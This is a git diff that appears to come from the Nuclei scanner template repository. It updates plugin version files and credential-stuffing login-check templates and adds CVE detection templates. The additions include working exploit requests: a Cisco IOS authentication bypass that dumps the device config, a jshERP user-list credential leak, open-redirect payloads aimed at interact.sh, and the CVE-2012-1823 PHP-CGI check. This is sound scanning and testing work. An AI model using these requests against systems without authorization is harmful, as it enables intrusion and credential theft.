a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 1947319e4b..01081dbb9f 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.5.5 \ No newline at end of file +3.5.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 94204632b7..72dfaf1650 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.7.2 \ No newline at end of file +7.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt index 5dae366723..9c51f30944 100644 --- a/helpers/wordpress/plugins/wordfence.txt +++ b/helpers/wordpress/plugins/wordfence.txt @@ -1 +1 @@ -7.9.3 \ No newline at end of file +7.10.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index ba17e93c11..89e0c3dba3 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -20.8 \ No newline at end of file +20.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index ab679818ce..a5ba932511 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.1.6 \ No newline at end of file +1.1.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-maintenance-mode.txt b/helpers/wordpress/plugins/wp-maintenance-mode.txt index ba5c9fca65..4484c2b27f 100644 --- a/helpers/wordpress/plugins/wp-maintenance-mode.txt +++ b/helpers/wordpress/plugins/wp-maintenance-mode.txt @@ -1 +1 @@ -2.6.7 \ No newline at end of file +2.6.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index 65cd0cf8e2..7918c7abbb 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.12.6 \ No newline at end of file +3.13.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 6f7e03a00d..91f3b43844 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.10.2 \ No newline at end of file +4.11.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 128cea90ad..55d8544beb 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.1.3 \ No newline at end of file +1.8.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index 1d094fc2bc..8912835c48 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.21.0 \ No newline at end of file +3.22.0 \ No newline at end of file diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml new file mode 100644 index 0000000000..44a87bdbb5 --- /dev/null +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -0,0 +1,38 @@ +id: CNVD-2020-63964 + +info: + name: jshERP - Information Disclosure + author: brucelsone + severity: high + description: | + jshERP that can reveal sensitive information including system credentials without credentials. + reference: + - https://cn-sec.com/archives/1798444.html + metadata: + max-request: 1 + fofa-query: jshERP-boot + shodan-query: http.favicon.hash:-1298131932 + tags: cnvd,cnvd2022,jsherp,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico" + + matchers-condition: and + matchers: + - type: word + words: + - '"username":' + - '"loginName":' + - '"password":' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/http/credential-stuffing/README.md b/http/credential-stuffing/README.md index 3f907ff796..79be6e9d37 100644 --- a/http/credential-stuffing/README.md +++ b/http/credential-stuffing/README.md @@ -36,7 +36,7 @@ In this case, you also need to provide the hostname/IP of the deployed instance By default, Nuclei uses Pitchfork mode in which it takes the first line from `email.txt` as the username input and the first line from `pass.txt` as the password parameter input. Ensure that both `email.txt` and `pass.txt` have an equal number of entries, with email/password combinations aligned on the same line in both files. -Starting with Nuclei 2.8, you can override the default behavior using the `-at` or `--attack-type` CLI option. Specifying the attack-type option as `clusterbomb` enables convenient verification of weak credentials for a list of given email addresses across various services. +Starting with Nuclei 2.8, you can override the default behavior using the `-at` or `-attack-type` CLI option. Specifying the attack-type option as `clusterbomb` enables convenient verification of weak credentials for a list of given email addresses across various services. For example, assuming `email.txt` contains: diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index a2c532f477..6a6e3c6f7d 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -1,14 +1,15 @@ id: atechmedia-codebase-login-check -info: - name: Atechmedia/Codebase Login Check - author: parthmalhotra,pdresearch - severity: critical - description: Checks for a valid Atechmedia/Codebase account. - reference: - - https://owasp.org/www-community/attacks/Credential_stuffing - tags: login-check,atechmedia,codebase,creds-stuffing - +info: + name: Atechmedia/Codebase Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid Atechmedia/Codebase account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 2 + tags: login-check,atechmedia,codebase,creds-stuffing self-contained: true http: - raw: diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml index f3274812c2..d2b3b5cd58 100644 --- a/http/credential-stuffing/cloud/atlassian-login-check.yaml +++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml @@ -7,6 +7,8 @@ info: description: Checks for a valid atlassian account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 tags: login-check,atlassian,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml index e6c26b5200..4ed8b20196 100644 --- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml +++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml @@ -7,6 +7,8 @@ info: description: Checks for a valid avnil pdf generator account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 tags: login-check,avnil-pdf,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml index 230834e673..8e80b3607e 100644 --- a/http/credential-stuffing/cloud/chefio-login-check.yaml +++ b/http/credential-stuffing/cloud/chefio-login-check.yaml @@ -6,6 +6,8 @@ info: description: Checks for a valid chef.io account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 tags: login-check,chefio,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml index 041682b2e5..0e59611a93 100644 --- a/http/credential-stuffing/cloud/codepen-login-check.yaml +++ b/http/credential-stuffing/cloud/codepen-login-check.yaml @@ -6,6 +6,8 @@ info: description: Checks for a valid codepen account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 2 tags: login-check,codepen,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index 226ac88a41..37d5ee2adb 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -7,6 +7,8 @@ info: description: Checks for a valid datadog account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 2 tags: login-check,datadog,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml index a9504ce3a0..8a30f80d72 100644 --- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml +++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml @@ -7,6 +7,8 @@ info: description: Checks for a valid atlassian account. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 tags: login-check,docker,creds-stuffing self-contained: true diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml index 748756ba8e..f9a606176d 100644 --- a/http/credential-stuffing/cloud/gitea-login-check.yaml +++ b/http/credential-stuffing/cloud/gitea-login-check.yaml @@ -1,14 +1,15 @@ id: gitea-login-check -info: - name: gitea.com Login Check - author: parthmalhotra,pdresearch - severity: critical - description: Checks for a valid gitea account. - reference: - - https://owasp.org/www-community/attacks/Credential_stuffing - tags: login-check,gitea,creds-stuffing - +info: + name: gitea.com Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid gitea account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 + tags: login-check,gitea,creds-stuffing self-contained: true http: - raw: diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index 6755c3b959..f7b461b874 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -1,14 +1,15 @@ id: github-login-check -info: - name: Github Login Check - author: parthmalhotra,pdresearch - severity: critical - description: Checks for a valid github account. - reference: - - https://owasp.org/www-community/attacks/Credential_stuffing - tags: login-check,github,creds-stuffing - +info: + name: Github Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 2 + tags: login-check,github,creds-stuffing self-contained: true http: - raw: diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index 08856cbd5a..87ab5ccf18 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -1,14 +1,15 @@ id: postman-login-check -info: - name: Postman Login Check - author: parthmalhotra,pdresearch - severity: critical - description: Checks for a valid postman account. - reference: - - https://owasp.org/www-community/attacks/Credential_stuffing - tags: login-check,postman,creds-stuffing - +info: + name: Postman Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid postman account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 2 + tags: login-check,postman,creds-stuffing self-contained: true http: - raw: diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml index 6525779775..69f8611985 100644 --- a/http/credential-stuffing/cloud/pulmi-login-check.yaml +++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml @@ -1,14 +1,15 @@ id: pulmi-login-check -info: - name: pulmi.com Login Check - author: parthmalhotra,pdresearch - severity: critical - description: Checks for a valid github account. - reference: - - https://owasp.org/www-community/attacks/Credential_stuffing - tags: login-check,pulmi,creds-stuffing - +info: + name: pulmi.com Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 + tags: login-check,pulmi,creds-stuffing self-contained: true http: - raw: diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index b49d88a20c..d51c10a5d8 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -7,8 +7,9 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - shodan-query: product:"GitLab Self-Managed" fofa-query: product="GitLab" + max-request: 2 + shodan-query: product:"GitLab Self-Managed" tags: login-check,gitlab,creds-stuffing,self-hosted variables: diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index b3442a3962..74dfcd3bdb 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -8,8 +8,9 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - shodan-query: title:"Grafana" fofa-query: title="Grafana" + max-request: 1 + shodan-query: title:"Grafana" tags: login-check,grafana,creds-stuffing,self-hosted variables: diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml index 4b34037e6d..7bc8059549 100644 --- a/http/credential-stuffing/self-hosted/jira-login-check.yaml +++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml @@ -8,8 +8,9 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - shodan-query: http.component:"Atlassian Jira" fofa-query: product="JIRA" + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: login-check,jira,creds-stuffing,self-hosted variables: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml new file mode 100644 index 0000000000..ea0869b5d1 --- /dev/null +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -0,0 +1,41 @@ +id: CVE-2001-0537 + +info: + name: Cisco IOS HTTP Configuration - Authentication Bypass + author: DhiyaneshDK + severity: medium + description: | + HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + reference: + - https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936 + - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/ + - https://nvd.nist.gov/vuln/detail/CVE-2001-0537 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cve-id: CVE-2001-0537 + cwe-id: CWE-287 + cvss-score: 5.0 + metadata: + max-request: 1 + verified: true + shodan-query: product:"Cisco IOS http config" && 200 + tags: cve,cve2001,cisco,ios,bypass + +http: + - method: GET + path: + - '{{BaseURL}}/level/16/exec/show/config/CR' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'service config' + - 'Switch' + - 'default-gateway' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml new file mode 100644 index 0000000000..31000bcb59 --- /dev/null +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -0,0 +1,31 @@ +id: CVE-2004-1965 + +info: + name: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS + author: ctflearner + severity: medium + description: | + Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/24055 + - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2004-1965 + cwe-id: NVD-CWE-Other + cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2004,redirect,xss,openbb + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml new file mode 100644 index 0000000000..5a95371b7c --- /dev/null +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -0,0 +1,36 @@ +id: CVE-2005-3634 + +info: + name: SAP Web Application Server 6.x/7.0 - Open Redirect + author: ctflearner + severity: medium + description: | + frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + reference: + - https://www.exploit-db.com/exploits/26488 + - https://cxsecurity.com/issue/WLB-2005110025 + - https://marc.info/?l=bugtraq&m=113156525006667&w=2 + - http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Multiple_XSS_in_SAP_WAS.pdf + - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031 + - https://nvd.nist.gov/vuln/detail/CVE-2005-3634 + classification: + cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N) + cvss-score: 5.0 + cve-id: CVE-2005-3634 + cwe-id: NVD-CWE-Other + cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: html:"SAP Business Server Pages Team" + tags: cve,cve2005,sap,redirect,business + +http: + - method: GET + path: + - "{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml new file mode 100644 index 0000000000..bc9e0ebac4 --- /dev/null +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -0,0 +1,35 @@ +id: CVE-2008-1547 + +info: + name: Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 + - https://www.exploit-db.com/exploits/32489 + - https://www.securityfocus.com/bid/31765/info + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2008-1547 + cwe-id: CWE-601 + cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* + metadata: + max-request: 2 + shodan-query: http.title:"Outlook" + tags: cve,cve2008,redirect,owa,exchange,microsoft + +http: + - method: GET + path: + - "{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh" + - "{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml new file mode 100644 index 0000000000..4b111acfa6 --- /dev/null +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -0,0 +1,33 @@ +id: CVE-2008-7269 + +info: + name: UC Gateway Investment SiteEngine v5.0 - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 + - https://www.exploit-db.com/exploits/6823 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-score: 5.8 + cve-id: CVE-2008-7269 + cwe-id: CWE-20 + cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: html:"SiteEngine" + verified: "true" + tags: cve,cve2008,redirect,siteengine + +http: + - method: GET + path: + - "{{BaseURL}}/api.php?action=logout&forward=http://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml new file mode 100644 index 0000000000..a22afd3e5f --- /dev/null +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -0,0 +1,33 @@ +id: CVE-2009-0347 + +info: + name: Autonomy Ultraseek - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2009-0347 + - https://www.exploit-db.com/exploits/32766 + - https://www.kb.cert.org/vuls/id/202753 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-score: 5.8 + cve-id: CVE-2009-0347 + cwe-id: CWE-59 + cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2009,redirect,autonomy + +http: + - method: GET + path: + - "{{BaseURL}}/cs.html?url=http://www.interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml new file mode 100644 index 0000000000..be1672ce8f --- /dev/null +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-1586 + +info: + name: HP System Management Homepage (SMH) v2.x.x.x - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1586 + - https://yehg.net/lab/pr0js/advisories/hp_system_management_homepage_url_redirection_abuse + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2010-1586 + cwe-id: CWE-20 + cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2010,redirect,smh,hp + +http: + - method: GET + path: + - "{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml new file mode 100644 index 0000000000..e6242ec0da --- /dev/null +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -0,0 +1,33 @@ +id: CVE-2011-5252 + +info: + name: Orchard 'ReturnUrl' Parameter URI - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + reference: + - https://www.exploit-db.com/exploits/36493 + - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 + - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 + cve-id: CVE-2011-5252 + cwe-id: CWE-20 + cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2011,redirect,orchard + +http: + - method: GET + path: + - "{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 6598735ea7..ae15fd0446 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -27,17 +27,15 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - condition: and + - type: word + part: body + words: + - "3d638155445bffb044eec401381ad784" - type: status status: - 200 - -# Enhanced by mp on 2022/04/04 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml new file mode 100644 index 0000000000..0352e782ec --- /dev/null +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -0,0 +1,31 @@ +id: CVE-2012-4982 +info: + name: Forescout CounterACT 6.3.4.1 - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + reference: + - https://www.exploit-db.com/exploits/38062 + - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html + - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 + cve-id: CVE-2012-4982 + cwe-id: CWE-20 + cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2012,redirect,forescout,counteract + +http: + - method: GET + path: + - "{{BaseURL}}/assets/login?a=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml new file mode 100644 index 0000000000..1b8e9b0ad9 --- /dev/null +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -0,0 +1,35 @@ +id: CVE-2012-6499 + +info: + name: WordPress Plugin Age Verification v0.4 - Open Redirect + author: ctflearner + severity: medium + description: | + Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + reference: + - https://www.exploit-db.com/exploits/18350 + - https://wordpress.org/plugins/age-verification + - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 + cve-id: CVE-2012-6499 + cwe-id: CWE-20 + cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification + +http: + - raw: + - | + POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1 + Host: {{Hostname}} + + redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970 + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml new file mode 100644 index 0000000000..ed6f87803b --- /dev/null +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -0,0 +1,34 @@ +id: CVE-2013-2621 +info: + name: Telaen => v1.3.1 - Open Redirect + author: ctflearner + severity: medium + description: | + Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + reference: + - https://www.exploit-db.com/exploits/38546 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683 + - https://nvd.nist.gov/vuln/detail/CVE-2013-2621 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2013-2621 + cwe-id: CWE-601 + cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + tags: cve,cve2012,telaen,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/telaen/redir.php?https://interact.sh" + - "{{BaseURL}}/redir.php?https://interact.sh" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git 